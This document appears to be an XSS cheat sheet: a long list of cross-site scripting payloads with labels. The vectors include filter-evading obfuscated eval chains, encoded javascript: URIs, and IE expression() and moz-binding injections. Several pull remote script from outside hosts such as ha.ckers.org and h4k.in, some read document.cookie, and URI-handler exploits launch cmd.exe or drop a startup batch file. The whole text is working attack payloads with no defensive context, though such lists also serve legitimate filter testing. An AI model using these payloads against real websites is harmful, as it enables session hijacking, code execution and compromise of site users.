Add onclick event handler
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>
Advanced HTML injection locator
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
Advanced XSS Locator
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
Advanced XSS Locator for title-Injections
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
aim: uri exploit
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
Backslash-obfuscated XBL injection - variant 1
<div/style=\-\mo\z\-&
#98\i\nd\in\g:&
#92url(//busi&
#110ess\i\nfo.&
#99o.uk\/labs
\/xbl\/xbl\
.xml\#xss)&>
Backslash-obfuscated XBL injection - variant 2
<div style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
Backslash-obfuscated XBL injection - variant 3
<div    style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
Backslash-obfuscated XBL injection - variant 4
<x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
Backslash-obfuscated XBL injection - variant 5
<BASE HREF="javascript:alert('XSS');//">
BASE
`> <script>alert(5)</script>
Basic back ticked attribute breaker
> <script>alert(4)</script>
Basic double quoted attribute breaker
xyz onerror=alert(6);
Basic JS breaker
1;a=eval;b=alert;a(b(/c/.source));
Basic JS breaker variant 1
1];a=eval;b=alert;a(b(17));//
Basic JS breaker variant 2
];a=eval;b=alert;a(b(16));//
Basic JS breaker variant 3
'];a=eval;b=alert;a(b(15));//
Basic JS breaker variant 4
1};a=eval;b=alert;a(b(14));//
Basic JS breaker variant 5
'};a=eval;b=alert;a(b(13));//
Basic JS breaker variant 6
};a=eval;b=alert;a(b(12));//
Basic JS breaker variant 7
a=1;a=eval;b=alert;a(b(11));//
Basic JS breaker variant 8
;//%0da=eval;b=alert;a(b(10));//
Basic JS breaker variant 9
';//%0da=eval;b=alert;a(b(9));//
Basic JS breaker variant 10
'> <script>alert(3)</script>
Basic single quoted attribute breaker
</title><script>alert(1)</script>
Basic title breaker
<BGSOUND SRC="javascript:alert('XSS');">
BGSOUND
<BODY BACKGROUND="javascript:alert('XSS');">
BODY background-image
<BODY ONLOAD=alert('XSS')>
BODY ONLOAD
<!--
<A href="
- --><a href=javascript:alert:document.domain
>test-->
Camouflaged comment injection with JS link
<IMG SRC=JaVaScRiPt:alert('XSS')>
Case Insensitive
<%3C<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\x3c\x3C\u003c\u003C
Character Encoding Example
<script>
var a = "</script> <script> alert('XSS !'); </script> <script>";
</script>
Closing JS Tag in JS String assignment
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
Commented-out Block
*/a=eval;b=alert;a(b(/e/.source));/*
Comment-breaker using obfuscated JavaScript
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
Conditional style injection for IE
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
Content Replace
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
Cookie Manipulation
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
DIV background-image 1
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
DIV background-image 2
<DIV STYLE="width: expression(alert('XSS'));">
DIV expression
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
DIV w/Unicode
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
Double open angle brackets
<A HREF="http://1113982867/">XSS</A>
Dword Encoding
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Embed Flash
<IMG SRC="jav
ascript:alert('XSS');">
Embedded Carriage Return
<IMG SRC="jav	ascript:alert('XSS');">
Embedded Encoded Tab
<IMG SRC="jav
ascript:alert('XSS');">
Embedded Newline
<IMG SRC="javascript:alert('XSS');">
Embedded Tab
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
End title tag
\";alert('XSS');//
Escaping JavaScript escapes
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Evade Regex Filter 1
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Evade Regex Filter 2
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Evade Regex Filter 3
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Evade Regex Filter 4
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Evade Regex Filter 5
eval(name)
Eval string contained in name property
<A HREF="http://www.google.com./">XSS</A>
Extra dot for Absolute DNS
<<SCRIPT>alert("XSS");//<</SCRIPT>
Extraneous Open Brackets
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Filter Evasion 1
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Filter Evasion 2
<A HREF="//google">XSS</A>
Firefox Lookups 1
<A HREF="http://ha.ckers.org@google">XSS</A>
Firefox Lookups 2
<A HREF="http://google:ha.ckers.org">XSS</A>
Firefox Lookups 3
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
firefoxurl: uri exploit (UXSS)
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
FRAME
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Grave Accents
<IMG SRC="javascript:alert('XSS')"
Half-Open HTML/JavaScript
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
Hex Encoding
<IMG SRC=javascript:alert('XSS')>
Hex Encoding w/out Semicolons
<IMG SRC=javascript:alert("XSS")>
HTML Entities
'';!--"<script>alert(0);</script>=&{(alert(1))}
HTML Quote & Comment breaker
<?xml version="1.0"?>
<html:html xmlns:html='http://www.w3.org/1999/xhtml'>
<html:script>
alert(document.cookie);
</html:script>
</html:html>
HTML wrapped in XML
<img src=`x` onrerror= ` ;; alert(1) ` />
IE backticked semicolon injection
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
IE closing-tag expression injection
style=color: expression(alert(0));" a="
IE expression injection
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
IE VB Messagebox injection
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
IFRAME
a=<a>
<b>
%3c%69%6d%67%2f%73%72%63%3d%31
%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e
</b>
</a>
document.write(unescape(a..b))
Image onerror wrapped in XML statement
<IMG SRC="jav	ascript:alert(<WBR>'XSS');">
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
<IMG SRC="jav
ascript:alert(<WBR>'XSS');">
Image tag with obfuscated JS URI
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Image w/CharCode
<IMG DYNSRC="javascript:alert('XSS');">
IMG Dynsrc
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
IMG Embedded commands 1
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
IMG Embedded commands 2
<IMG LOWSRC="javascript:alert('XSS');">
IMG Lowsrc
<IMG SRC=javascript:alert('XSS')>
IMG No Quotes/Semicolon
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
IMG STYLE w/expression
<IMG SRC="javascript:alert('XSS');">
IMG w/JavaScript Directive
<IMG SRC='vbscript:msgbox("XSS")'>
IMG w/VBscript
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
INPUT Image
<A HREF="http://66.102.7.147/">XSS</A>
IP Encoding
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1
JavaScript concatenation vector variant 1
s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7;
JavaScript concatenation vector variant 2
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
JavaScript concatenation vector variant 3
s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];
JavaScript concatenation vector variant 4
s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+''];
JavaScript concatenation vector variant 5
s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;
JavaScript concatenation vector variant 6
s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';
JavaScript concatenation vector variant 7
<BR SIZE="&{alert('XSS')}">
JavaScript Includes
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
JavaScript Link Location
%0da=eval;b=alert;a(b(/d/.source));
JavaScript-breaker using carriage return
<a href = "javas cript :ale rt(1)">test
JS link with whitespace obfuscation
+alert(0)+
JS string concatenation breaker
<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;
JSON based obfuscated onload vector
<body onload=a1={x:this.parent.document};a1.x.writeln(1);>
JSON based onload vector
<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
JSON based semicolon-onload vector
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
LAYER
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
List-style-image
<IMG SRC="livescript:[code]">
Livescript
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
Local .htc file
<IMG SRC=javascript:alert('XSS')>
Long UTF-8 Unicode w/out Semicolons
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Malformed IMG Tags
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
Markup breaker with special quotes
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
META
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
META w/additional URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
META w/data:URL
<A HREF="http://6	6.000146.0x7.147/">XSS</A>
Mixed Encoding
<IMG SRC="mocha:[code]">
Mocha
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
Mozilla -moz-binding-url injection
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
Mozilla -moz-binding-url injection - filter evading
_
=
eval
b=1
__
=
location
c=1
_
(
__
.
hash
//
.
substr
(1)
)
Multiline selfcontained XSS
<IMGSRC="javascript:alert('XSS')">
Multiline w/Carriage Returns
b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name
Name contained XSS variant 1
a=/ev///
.source a+=/al///
.source a[a] (name)
Name contained XSS variant 2
a=/ev/
.source a+=/al/
.source,a = a[a] a(name)
Name contained XSS variant 3
setTimeout//
(name// ,0)
Name contained XSS variant 4
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
navigatorurl: code execution
<SCRIPT SRC=http://ha.ckers.org/xss.js
No Closing Script Tag
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
No Quotes/Semicolons
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Non-Alpha/Non-Digit
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Non-Alpha/Non-Digit Part 2
</noscript>
<code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
Noscript-breaker with mouseover
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
Null Chars 1
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
Null Chars 2
<body onload=;;;;;;;;;;;_=alert;_(1);;;;
Obfuscated body onload vector
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=
0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=
0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa
rentNode;x.appendChild(i);
Obfuscated DOM element creation
<body <body onload=;;;;;al:eval('al'+'ert(1)');;>
Obfuscated double-body onload vector
<IMGSRC=java&<WBR>#115;crip&<WBR>#116;:a
le&<WBR>#114;t('XS<WBR>;S')>
Obfuscated image tag using dec entities
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(
&<WBR>#x27XSS')>
Obfuscated image tag using hex entities
<IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:
&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
Obfuscated image tag using long dec entities
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
Obfuscated JS image source
(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
Obfuscated name trigger for Firefox
<body/s/onload=x={doc:parent.document};x.doc.writeln(1)
Obfuscated onload attribute variant 1
<body/””$/onload=x={doc:parent['document']};x.doc.writeln(1)
Obfuscated onload attribute variant 2
<body/""$/onload=x={doc:parent['document']};x.doc.writeln(1)
Obfuscated onload attribute variant 3
(ah: added 05-dec-11)
123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);
Obfuscated XML predicate vector variation 1
s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:
0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/
s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/
s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:
0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:
0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
Obfuscated XML predicate vector variation 2
o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</
s>};function f() { 0[this.x](this.y) }f.call(o);
Obfuscated XML predicate vector variation 3
___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___)
Obfuscated XSS variant 1
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
OBJECT
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
OBJECT w/Embedded XSS
a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";eval(a+b+c+d);
OBJECT w/Flash 2
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
Octal Encoding
open(name)
Open string contained in name property
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
PHP
alert(1)
Plain JavaScript alert
<A HREF="//www.google.com/">XSS</A>
Protocol Resolution Bypass
<SCRIPT SRC=//ha.ckers.org/.j>
Protocol resolution in script tags
0%0d%0a%00<script src=//h4k.in>
RegExp based, and native C filter vector.
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)
'+'';
u1=s1+s2+s3;URL=u1
Remote IE URL overloading
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Remote Stylesheet 1
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
Remote Stylesheet 2
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
Remote Stylesheet 3
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
Remote Stylesheet 4
<A HREF="http://google.com/">XSS</A>
Removing Cnames
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
Rename .js to .jpg
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
res:// installed software probing
<SCRIPT>alert('XSS')</SCRIPT>
SCRIPT w/Alert()
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
SCRIPT w/Char Code
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
SCRIPT w/Source File
a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1))
Self-contained XSS variant 1
a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
Self-contained XSS variant 2
eval.call(this,unescape.call(this,location))
Self-contained XSS variant 3
d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b)))
Self-contained XSS variant 4
l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a
Self-contained XSS variant 5
_=eval,__=unescape,___=document.URL,_(__(___))
Self-contained XSS variant 6
$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)
Self-contained XSS variant 7
$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))
Self-contained XSS variant 8
evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod)
Self-contained XSS variant 9
with(location)with(hash)eval(substring(1))
Self-containing XSS with no dots
<IMG SRC="  javascript:alert('XSS');">
Spaces/Meta Chars
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
SSI
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
STYLE
<style>
body:after{
content: “\61\6c\65\72\74\28\31\29″
}
</style>
<script>
eval(eval(document.styleSheets[0].cssRules[0].style.content))
</script>
Style injection via content and double-eval
<XSS STYLE="xss:expression(alert('XSS'))">
STYLE w/Anonymous HTML
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
STYLE w/background
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
STYLE w/background-image
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
STYLE w/broken up JavaScript
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
STYLE w/Comment
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Stylesheet
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
Style-breaker using obfuscated JavaScript
>"'
Super basic HTML breaker 2
a=alert
a(0)
Super short XSS variant 1
A=alert;A(1)
Super short XSS variant 2
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
TABLE
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
TD
</textarea>
<code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
Textarea-breaker with mouseover
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
Unicode encoded script tags
http://aa"><script>alert(123)</script>
URL breaker for double quotes
http://aa'><script>alert(123)</script>
URL breaker for single quotes
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
URL encoded image source